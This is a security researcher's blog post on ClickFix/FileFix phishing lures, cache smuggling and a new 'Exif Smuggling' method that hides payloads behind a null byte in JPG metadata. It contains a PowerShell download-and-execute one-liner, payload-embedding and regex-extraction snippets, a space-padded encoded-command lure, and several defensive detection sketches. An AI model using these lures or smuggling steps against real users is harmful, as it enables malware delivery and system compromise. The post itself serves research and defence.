Look At This Photograph - Passively Downloading Malware Payloads Via Image Caching

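Summary: The article describes a phishing technique that combines ClickFix and FileFix and uses Cache Smuggling to hide malware in the browser cache. The author proposes an improved method that stores the payload in the Exif data of a JPG image for better stealth, and shows how the hidden code can be extracted and executed with PowerShell. 2025-10-24 19:45 Author: malwaretech.com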

Recently, at my day job I came across this unique ClickFix / FileFix style phishing page. It merges FileFix and Cache Smuggling to avoid its first stage loader having to make any web requests. Instead, the loader simply extracts the second-stage payload from the web browser’s cache, where it was placed using Cache Smuggling.

This attack inspired me to come up with an improved, more versatile technique, which I’m going to detail here.

If you’re unfamiliar with Cache Smuggling or ClickFix, I highly recommend you read my previous blog first.

A common ClickFix lure poses as a Captcha and attempts to social engineer the user into running malicious commands. This variant is typically pushed onto websites via malvertising or by compromising the web server.

A ClickFix variant masquerading as a Captcha test

In this case the fake Captcha prompts the users to press Win + R, Ctrl + V, then Enter. On Windows, the Win + R shortcut opens the Run window, which is used to launch executables. Ctrl + V pastes text from the clipboard, and Enter submits whatever text was pasted.

This attack leverages the fact that webpages can use JavaScript to write text to the user’s clipboard. In the background the website has already populated the clipboard with a malicious command, which will be run when the user enters it into the Run window.

Many script hosts such as PowerShell and WScript allow scripts to be passed as plaintext via the command line, which enables Run to be abused to execute arbitrary code.

One limitation of the original ClickFix technique is that Run’s input text box limit is set to MAX_PATH (260 characters). This means that the attacker’s entire malicious script, as well as the command to invoke it, must fit within 260 characters.

Run’s extremely low character limit aggressively restricts functionality, resulting in many threat actors resorting to rudimentary PowerShell & MSHTA downloaders, which are easily detected by security products.

An example would be the following command, which uses the Net.WebClient object to download a second-stage PowerShell script, then IEX (Invoke-Expression) to run it.

powershell -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('https://example.local/payload')"

This is where a variant of the technique known as FileFix comes into play.

For all intents and purposes FileFix is just ClickFix, but the lure social engineers users into pasting text into the Windows Explorer address bar instead.

Explorer’s address bar exhibits the exact same behavior as the Run window, except the address bar is limited to 2048 characters, which is significantly larger than Run’s 260.

Many threat actors also leverage the fact that unless the user is running Explorer full-screen on an extremely large monitor, only a small portion of pasted text will be visible. Attackers abuse this by padding their commands with spaces, enabling them to dictate which portion the user sees (usually a comment containing a mundane file path or something).
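From a defender's point of view, the padding trick described above leaves an obvious trace: a long run of consecutive spaces inside a command line. The following is a minimal sketch of that heuristic. The function name `has_suspicious_padding` and the threshold of 50 spaces are assumptions chosen for illustration, not values taken from any product or from the campaign.

```python
import re


def has_suspicious_padding(command_line: str, min_run: int = 50) -> bool:
    """Return True if the command line contains a run of at least min_run spaces.

    min_run is an arbitrary illustrative threshold, not a tuned value.
    """
    return re.search(r" {%d,}" % min_run, command_line) is not None


# A padded command modelled loosely on the pattern described above (placeholder values).
padded = "powershell.exe -EncodedCommand <base64>" + " " * 300 + "# C:\\Reports\\summary.txt"
print(has_suspicious_padding(padded))                       # True
print(has_suspicious_padding("notepad.exe C:\\notes.txt"))  # False
```

A real detection would likely also consider tabs and other whitespace characters, which this sketch ignores.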

The specific version we saw was masquerading as a FortiClient Compliance Checker.

The webpage containing the FortiClient phishing lure

This attack also benefits heavily from webpages being able to use JavaScript to open Windows Explorer for you. “Why is that even a feature?” you might ask. Well, it’s because cybersecurity was invented last year and before that everyone just implemented whatever.

What was unique about this specific FileFix variant is it incorporated cache smuggling.

Cache smuggling lets an attacker use the web browser’s cache to place arbitrary files on the system. This allowed the malicious PowerShell command to avoid making any web requests at all, making it much less likely to be caught by EDRs or other security tools.

Typically, browsers cache static web assets such as CSS, JavaScript, and image files. But as Aurelien, the author of the original cache smuggling blog, discovered, the file’s content doesn’t actually matter. Just set the HTTP Content-Type header to image/jpeg, embed an exe file using <img src="/malware.exe">, and the web browser will happily save the file to disk for you.

In the case of the FortiClient campaign, the JavaScript uses fetch() to retrieve a fake JPG, which is actually a ZIP file. The PowerShell script then searches the browser’s cache folder for the ZIP file, and extracts and runs the malware from it.

Now, I do have one gripe with the technique as implemented in the FileFix campaign (and on the original blog). It just tries to pass off arbitrary file types as JPG images. This means there’s no valid JPG header, so the image is invalid. This has several shortcomings:

Because the file is not a real JPG, the browser will consider it corrupted and show the broken image icon (which is likely why the phishing lure uses JavaScript to fetch() the image without loading it).
Any firewall doing TLS inspection should be alerting on mismatches between file header and file type/extension (which is a pretty old trick). I say should, because that implies we’re actually trying to do cybersecurity.
Touching a file on disk triggers an on-access scan by the antivirus. The second the PowerShell script interacts with the cache file, the antivirus will scan it. The filetype is irrelevant.

The last issue can be easily mitigated by encrypting the cache-smuggled file, ensuring that the raw payload never touches disk. It’d only take a small addition to the loader to decrypt the payload after extracting it from the cache file.

But addressing the first two points requires some creativity.
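To make the second point concrete, here is a minimal sketch of the kind of header check an inspecting proxy could apply. It only compares a declared Content-Type against the JPEG start-of-image signature. The function names are hypothetical and the logic is deliberately simplistic; it does not represent how any particular firewall works.

```python
JPEG_MAGIC = b"\xff\xd8\xff"  # start-of-image marker plus the first byte of the next marker


def looks_like_jpeg(body: bytes) -> bool:
    """Return True if the body starts with the JPEG signature."""
    return body.startswith(JPEG_MAGIC)


def content_type_mismatch(declared_type: str, body: bytes) -> bool:
    """Flag responses declared as image/jpeg whose body lacks the JPEG signature."""
    declared = declared_type.split(";")[0].strip().lower()
    return declared == "image/jpeg" and not looks_like_jpeg(body)


# A ZIP archive starts with "PK\x03\x04", so it is flagged when served as image/jpeg.
print(content_type_mismatch("image/jpeg", b"PK\x03\x04rest-of-archive"))    # True
print(content_type_mismatch("image/jpeg", b"\xff\xd8\xff\xe1rest-of-jpg"))  # False
```

A check like this catches the fake JPG used in the campaign, but it passes any file that is a genuinely valid image.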

My first thought upon seeing the Cache Smuggling examples was: why not use steganography? Steganography enables us to conceal arbitrary data in an image by encoding it into individual pixels. We could encode the entire payload into a real image, then have the PowerShell script decode it.

Quite quickly, I realized why no FileFix variants have gone with this method. Trying to fit an entire JPG decoder into a script of fewer than 2048 characters is close to impossible. Furthermore, we ideally want to use much less than the maximum character limit to give us space for padding (space for padding…get it? The padding is done with spaces…..ok, whatever, just forget it).

My next idea was using Exif data. JPGs support storing metadata in images via Exif (Exchangeable image file format). Typically, this is used by digital cameras to store data about a photo such as where/when it was taken, camera settings, model, lenses, etc. I wondered if one of the metadata fields would be large enough to store my second stage payload.

To my surprise, the size limit of the Exif header was much larger than expected. Up to 64 KB of metadata can be stored in the image. Better yet, a single Exif field can use up almost all of that 64 KB.
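The 64 KB ceiling follows from the JPEG container: each marker segment carries a 2-byte big-endian length, so a segment (including those two length bytes) cannot exceed 65,535 bytes. The sketch below walks the segments of a JPEG and reports the declared size of the Exif APP1 segment, which could be one input to a "suspiciously large metadata" heuristic. The function name is hypothetical, and the walker assumes a simple, well-formed file with no fill bytes or standalone markers before the image data.

```python
import struct


def exif_segment_size(jpeg: bytes):
    """Return the declared length of the first Exif APP1 segment, or None if absent."""
    if not jpeg.startswith(b"\xff\xd8"):
        return None  # missing start-of-image marker, not a JPEG
    pos = 2
    while pos + 4 <= len(jpeg):
        if jpeg[pos] != 0xFF:
            return None  # lost sync with the segment structure
        marker = jpeg[pos + 1]
        if marker == 0xDA:
            return None  # start of scan: metadata segments are over
        (length,) = struct.unpack(">H", jpeg[pos + 2:pos + 4])
        if marker == 0xE1 and jpeg[pos + 4:pos + 10] == b"Exif\x00\x00":
            return length
        pos += 2 + length  # skip the marker bytes plus the segment body
    return None


# Synthetic file: SOI, one APP1 segment holding 100 filler bytes, then EOI.
body = b"Exif\x00\x00" + b"A" * 100
sample = b"\xff\xd8" + b"\xff\xe1" + struct.pack(">H", 2 + len(body)) + body + b"\xff\xd9"
print(exif_segment_size(sample))  # 108
print(0xFFFF - 2 - 6)             # 65527 bytes left after the length field and "Exif\0\0"
```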

I also discovered a useful quirk with how metadata is parsed, which allows us to conceal Exif data from some parsers.

Truncating Exif Data

Exif fields can have different types (byte, short, long, float, ascii, etc). Standard ascii formatted text strings use a null byte to denote the end of the string. However, the Exif format specifies a length (count) field for every data type, including ascii. This means that while most text parsers will stop reading at the first null byte, the true size of the field can be much larger.

If we set the ascii field’s count value to the maximum possible, we can store up to 64-KB of data into it without breaking the Exif format. But since most software considers a null byte to denote the end of an ascii string, we can conceal data from many Exif parsers by placing a null byte prior to our payload.

Provided we use a field of ascii type, setting the value to something like <some text here><null byte><our payload> should stop these parsers from displaying the portion of the field that contains the payload.

I tested this by setting the Image Description field to Definitely Not Malware\0 AAAAAAAAAAAAAAAAAAAAAAAAA using Python.

The Exif data as shown by Windows Explorer

As you can see, only the “Definitely Not Malware” portion of the string is visible when we view the Exif data with Right Click > Properties. However, when we open the image in a Hex Editor, we can still see the AAAAAAAAAAAAAAAAAAAAAAAAA portion is present in the Exif.

The image as seen in a Hex Editor

Since the Exif “count” values are used when performing Exif parsing, this does not interfere with any other Exif fields, or the rendering of the image. The data is entirely valid, it’s just normal for software not to read past the null byte when displaying a text string.
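The same quirk gives defenders something to look for: an ascii field whose count extends well past its first null byte. The sketch below parses only the first image file directory (IFD0) of the TIFF structure that follows the "Exif\0\0" prefix, and reports ascii fields with non-null data after the first null. The function name is hypothetical, and the sample data is a synthetic structure modelled on the test described above rather than the actual image.

```python
import struct

ASCII_TYPE = 2  # Exif/TIFF type code for ascii strings


def find_hidden_ascii(tiff: bytes):
    """Yield (tag, visible_text, hidden_length) for IFD0 ascii fields with data after the first NUL."""
    if tiff[:2] == b"II":
        endian = "<"  # little-endian ("Intel") byte order
    elif tiff[:2] == b"MM":
        endian = ">"  # big-endian ("Motorola") byte order
    else:
        raise ValueError("not a TIFF header")
    magic, ifd_offset = struct.unpack(endian + "HI", tiff[2:8])
    if magic != 42:
        raise ValueError("bad TIFF magic number")
    (entries,) = struct.unpack(endian + "H", tiff[ifd_offset:ifd_offset + 2])
    for i in range(entries):
        start = ifd_offset + 2 + 12 * i
        tag, ftype, count, value = struct.unpack(endian + "HHI4s", tiff[start:start + 12])
        if ftype != ASCII_TYPE:
            continue
        if count <= 4:
            data = value[:count]  # short values are stored inline
        else:
            (offset,) = struct.unpack(endian + "I", value)
            data = tiff[offset:offset + count]  # offset is relative to the TIFF header
        visible, _, rest = data.partition(b"\x00")
        hidden = rest.rstrip(b"\x00")
        if hidden:
            yield tag, visible, len(hidden)


# Synthetic IFD0 with a single ImageDescription (tag 0x010E) entry.
description = b"Definitely Not Malware\x00" + b"A" * 25
tiff = (
    b"II" + struct.pack("<HI", 42, 8)  # TIFF header, IFD0 at offset 8
    + struct.pack("<H", 1)             # one directory entry
    + struct.pack("<HHII", 0x010E, ASCII_TYPE, len(description), 26)
    + struct.pack("<I", 0)             # no further IFDs
    + description                      # value stored at offset 26
)
print(list(find_hidden_ascii(tiff)))
```

This is only a starting point. It ignores the Exif sub-IFD and IFD1, and it can produce false positives for fields that legitimately hold several null-separated strings, such as Copyright.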

Since we’re able to store a single contiguous blob of binary data in the Exif header of the JPG, we don’t actually need an Exif parser to extract it. We can just wrap the data with some tags, then use RegEx to extract everything in between. I chose to wrap the data like so 13371337<payload data>13371337.

So my ImageDescription field now looks like this: Definitely Not Malware<null byte>13371337<payload data>13371337

Here is a snippet of the Python code I use to store my payload into the JPG’s Exif data.

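# Visible portion of the field, terminated by a null byte
image_description = b'Definitely Not Malware\x00'
# payload_data is a bytes object defined elsewhere; the 13371337 markers delimit it for the RegEx
full_payload = image_description + b'13371337' + payload_data + b'13371337'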

This results in the payload data being hidden in the Image Description, which will simply display “Definitely Not Malware”.

Then to extract it via PowerShell, the following code should work:

$content = [System.Text.Encoding]::Default.GetString([System.IO.File]::ReadAllBytes($file_name));
$match = [regex]::Match($content, "(?s)13371337(.*?)13371337");

All the PowerShell script needs to do is iterate through the browser’s cache directory and wait for a RegEx match.

To demonstrate this, I put together a basic proof-of-concept phishing page which conceals a “Hello World” DLL inside the Exif data of the page logo.

Proof-of-Concept Phishing Lure

It replicates the FileFix technique where the malicious command is hidden with spaces, like so.

conhost.exe --headless powershell.exe -EncodedCommand <base64 command here> -ExecutionPolicy                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "\\\\NetworkShare\\Finance\\Reports\\EmployeeSalaries.txt"

When pasted into Explorer, this is all the user sees.

What the user sees while pasting the command into the Explorer address bar

The malicious command my example website copies to the clipboard runs powershell.exe and passes a base64 encoded script. The encoded script is responsible for making a copy of the browser’s cache folder, then iterating through each file looking for the 13371337 placeholder.

In this case the payload is simply a hello world DLL file, which is not encrypted. Though adding encryption/decryption capabilities is trivial, I decided not to for the purposes of this example.

While most websites and services strip Exif metadata for privacy reasons, I did find another interesting attack surface: Microsoft Outlook.

Microsoft Outlook is essentially just a glorified Edge web browser, so it treats images the same way a browser would. This makes it possible to perform Exif Smuggling via email as well. Just attach the JPG to an email and send it to the target (I’m sure this behavior works with other clients too, but I only tested with Outlook).

What’s interesting about Outlook’s behavior is that it seems to both preemptively cache AND download image attachments, even when image previewing is disabled in the preview panel. In both cases the Exif data was not stripped, making it possible to use Exif Smuggling to download a payload onto the target’s system without them even having to open the email.

Although malware is still required to extract and execute the payload from the cache, this technique provides many alternative means of getting second-stage payloads onto a target system. Malicious software, scripts, and exploits are known to perform web requests to download second-stage payloads. With Exif Smuggling, the need for downloading or embedding second-stage payloads can be eliminated entirely.

Though malware leveraging Exif data to conceal malicious code is nothing new, it’s typically only been used in the context of images downloaded by the malware itself. But when combined with Cache Smuggling, any software which caches images (without first stripping Exif data) can be used to passively download follow-up payloads.

This functionality is not just limited to ClickFix, since it could also be used to make c2-less loaders. Instead of performing web requests, the loader would simply monitor various software cache directories for files containing predetermined signatures.

Consequently, it’s important that security vendors not rely on the assumption that a malicious script must either embed a payload directly, or perform a web request to fetch one. If the second-stage payload has already been smuggled onto the system via caching, controls which restrict a script’s ability to make web requests are rendered ineffective.

For more, follow me on Bluesky, LinkedIn, Threads, or Mastodon. I plan on posting the source code for the Proof-of-Concept next week.

Here is a link to the Exif Smuggling + FileFix Proof-of-Concept I wrote for Chrome.

Source: https://malwaretech.com/2025/10/exif-smuggling.html